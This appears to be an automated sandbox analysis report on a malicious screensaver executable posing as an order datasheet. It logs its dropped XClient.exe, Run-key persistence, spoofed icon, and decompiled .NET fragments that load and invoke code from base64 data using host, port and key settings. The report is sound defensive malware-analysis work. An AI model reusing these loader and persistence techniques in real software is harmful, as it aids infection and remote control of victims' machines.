Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ORDERDATASHEET#PO8738763.scr.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: ORDERDATASHEET#PO8738763.scr.exe

Static file information: File size 2270208 > 1048576

Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ORDERDATASHEET#PO8738763.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: ORDERDATASHEET#PO8738763.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: RegSvcs.pdb, source: XClient.exe, 00000010.00000000.1930674141.0000000000D12000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.3.dr
Source:	Binary string: RegSvcs.pdb source: XClient.exe, 00000010.00000000.1930674141.0000000000D12000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.3.dr

Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, Messages.cs	.Net Code: Memory

Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: section name: .managed
Source: ORDERDATASHEET#PO8738763.scr.exe	Static PE information: section name: hydrated
Source: ORDERDATASHEET#PO8738763.scr.exe.0.dr	Static PE information: section name: .managed
Source: ORDERDATASHEET#PO8738763.scr.exe.0.dr	Static PE information: section name: hydrated

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D1EDF9 push es; iretd	3_2_06D1EDFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D34211 push es; ret	3_2_06D34220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D4A6DB push eax; ret	3_2_06D4A6E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D4FE41 push es; retf	3_2_06D4FE9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D4FC0D push es; retf	3_2_06D4FC0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D452CF push eax; retf	3_2_06D452D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D4FA65 push es; iretd	3_2_06D4FA3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D493BB push es; ret	3_2_06D493C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D47330 push es; ret	3_2_06D47340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D4FB3D push es; retf	3_2_06D4FC0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_03454277 push ebx; ret	4_2_034542DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04EA633D push eax; ret	7_2_04EA6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_041542BD push ebx; ret	9_2_041542DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0415635D push eax; ret	9_2_04156371
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081579C0 push eax; ret	9_2_081579D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081579C8 push eax; ret	9_2_081579D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081579E4 push eax; ret	9_2_081579D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04956348 push eax; ret	11_2_04956351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04952C5C push 04B8078Eh; retf	11_2_04952CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04955DDB push esp; ret	11_2_04955DE3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04955EF0 push 8B05AE23h; retf	11_2_04955EF5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_049568FC pushad ; ret	11_2_04956903
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04956820 push eax; ret	11_2_04956833

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe			Jump to dropped file
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	File created: C:\Users\user\ORDERDATASHEET#PO8738763.scr.exe			Jump to dropped file

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

File created: C:\Users\user\ORDERDATASHEET#PO8738763.scr.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

File created: C:\Users\user\ORDERDATASHEET#PO8738763.scr.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon (2112).png

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
